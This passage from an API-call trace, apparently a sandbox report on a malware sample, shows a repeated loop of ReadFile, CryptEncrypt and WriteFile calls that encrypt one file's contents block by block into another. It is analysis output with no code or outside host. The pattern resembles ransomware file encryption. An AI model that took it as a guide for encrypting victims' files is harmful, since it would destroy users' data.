lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.042] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.042] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.042] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.042] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.042] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.042] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.042] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.042] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.042] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.043] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.043] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.043] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.043] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.043] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.043] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.043] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.043] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.043] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.043] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.043] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.043] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.043] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.044] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.044] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.044] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.044] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.044] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.044] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.044] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.044] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.044] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.044] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.044] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.045] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.045] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.045] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.045] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.045] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.045] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.045] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.045] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.045] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.045] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.046] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.046] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.046] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.046] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.046] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.046] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.046] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.046] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.046] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.046] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.046] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.047] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.047] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.047] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.047] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.047] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.047] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.047] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.047] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.047] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.047] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.047] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.047] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.048] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.048] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.048] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.048] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.048] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.048] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.048] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.048] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.048] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.049] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.049] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.049] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.049] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.049] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.049] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.050] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.050] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.050] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.050] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.050] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.050] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.050] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.050] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.050] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.050] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.051] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.051] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.051] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.051] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.051] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.051] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.051] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.051] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.051] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.051] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.052] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 